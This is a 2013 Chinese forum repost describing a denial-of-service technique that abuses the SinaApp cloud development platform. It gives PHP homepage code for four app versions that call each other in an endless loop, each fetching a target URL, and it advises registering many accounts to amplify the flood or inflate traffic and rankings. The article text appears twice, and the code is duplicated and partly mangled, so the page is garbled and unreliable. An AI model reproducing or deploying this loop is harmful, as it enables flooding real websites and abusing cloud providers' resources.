-
-
黑客可利用云开发平台进行DDOS攻击
-
发表于: 2013-5-21 09:38 1136
-
说是DDOS攻击,实际上还可以用来刷流量和排名。估计这个想法很多大牛之前已经有想过,昨天在使用sinaapp时测试了下,貌似可行,所以和大家分享下。
大牛小牛应该都知道sinaapp、百度site app等都为开发者提供了很好的开放平台,注册也很简单。每个用户可以创建不同版本的app应用,攻击者可以利用该特点,注册大量用户,编写PHP代码对目标发起攻击,在测试过程中,我使用了一个帐号,创建了4个版本的APP进行测试,在自己站点上写了个记录访问者ip的文件作为被攻击者,效果不错,该记录文件每秒的容量暴涨(说明app访问被攻击者网站的频率很高)。下面看下测试步骤:
PS:主要使用sinaapp作为测试对象。
测试思路:创建4个版本的app.
版本1 主页代码如下:
file_get_contents('http://2.mars.sinaapp.com/');//版本1触发攻击(访问版本2)
?> file_get_contents('http://2.mars.sinaapp.com/');//版本1触发攻击(访问版本2)
> file_get_contents('http://2.mars.sinaapp.com/');//版本1触发攻击(访问版本2)
>
版本2 主页代码:
file_get_contents('http://www.xxx.com/ip.php')://攻击目标
file_get_contents('http://3.mars.sinaapp.com/');//访问版本3
?> file_get_contents('http://www.xxx.com/ip.php')://攻击目标
file_get_contents('http://3.mars.sinaapp.com/');//访问版本3
> file_get_contents('http://www.xxx.com/ip.php')://攻击目标
file_get_contents('http://3.mars.sinaapp.com/');//访问版本3
>
版本3 主页代码:
for ($i=1; $< for ($i=1; $< for ($i=1; $<=10; $i++){//这里邪恶了一下,多来几次效果更佳
file_get_contents('http://www.xxx.com/ip.php');
file_get_contents('http://4.mars.sinaapp.com/'); }
>
版本4 主页代码:
file_get_contents('http://2.mars.sinaapp.com/');//访问版本2,导致死循环
?> file_get_contents('http://2.mars.sinaapp.com/');//访问版本2,导致死循环
> file_get_contents('http://2.mars.sinaapp.com/');//访问版本2,导致死循环
>
以上是使用一个sinaapp用户进行攻击的步骤,可以自己扩展,注册大量用户及创建更多的版本进行攻击。但在测试过程中发现,每个APP实际上有两个IP出口。使用多个用户效果会更好。
PS:大家应该会有个疑问,为什么要创建版本4,这个我也是在实验中发现的,如果使用版本2和版本3直接互调,则达不到攻击的效果,版本2和版本3只访问被攻击目标一次旧停止了。有哪位大牛知道为什么的还请不惜赐教.
原文出自【比特网】,转载请保留原文链接:http://sec.chinabyte.com/348/12620348.shtml
大牛小牛应该都知道sinaapp、百度site app等都为开发者提供了很好的开放平台,注册也很简单。每个用户可以创建不同版本的app应用,攻击者可以利用该特点,注册大量用户,编写PHP代码对目标发起攻击,在测试过程中,我使用了一个帐号,创建了4个版本的APP进行测试,在自己站点上写了个记录访问者ip的文件作为被攻击者,效果不错,该记录文件每秒的容量暴涨(说明app访问被攻击者网站的频率很高)。下面看下测试步骤:
PS:主要使用sinaapp作为测试对象。
测试思路:创建4个版本的app.
版本1 主页代码如下:
file_get_contents('http://2.mars.sinaapp.com/');//版本1触发攻击(访问版本2)
?> file_get_contents('http://2.mars.sinaapp.com/');//版本1触发攻击(访问版本2)
> file_get_contents('http://2.mars.sinaapp.com/');//版本1触发攻击(访问版本2)
>
版本2 主页代码:
file_get_contents('http://www.xxx.com/ip.php')://攻击目标
file_get_contents('http://3.mars.sinaapp.com/');//访问版本3
?> file_get_contents('http://www.xxx.com/ip.php')://攻击目标
file_get_contents('http://3.mars.sinaapp.com/');//访问版本3
> file_get_contents('http://www.xxx.com/ip.php')://攻击目标
file_get_contents('http://3.mars.sinaapp.com/');//访问版本3
>
版本3 主页代码:
for ($i=1; $< for ($i=1; $< for ($i=1; $<=10; $i++){//这里邪恶了一下,多来几次效果更佳
file_get_contents('http://www.xxx.com/ip.php');
file_get_contents('http://4.mars.sinaapp.com/'); }
>
版本4 主页代码:
file_get_contents('http://2.mars.sinaapp.com/');//访问版本2,导致死循环
?> file_get_contents('http://2.mars.sinaapp.com/');//访问版本2,导致死循环
> file_get_contents('http://2.mars.sinaapp.com/');//访问版本2,导致死循环
>
以上是使用一个sinaapp用户进行攻击的步骤,可以自己扩展,注册大量用户及创建更多的版本进行攻击。但在测试过程中发现,每个APP实际上有两个IP出口。使用多个用户效果会更好。
PS:大家应该会有个疑问,为什么要创建版本4,这个我也是在实验中发现的,如果使用版本2和版本3直接互调,则达不到攻击的效果,版本2和版本3只访问被攻击目标一次旧停止了。有哪位大牛知道为什么的还请不惜赐教.
原文出自【比特网】,转载请保留原文链接:http://sec.chinabyte.com/348/12620348.shtml
赞赏
看原图
赞赏
雪币:
留言: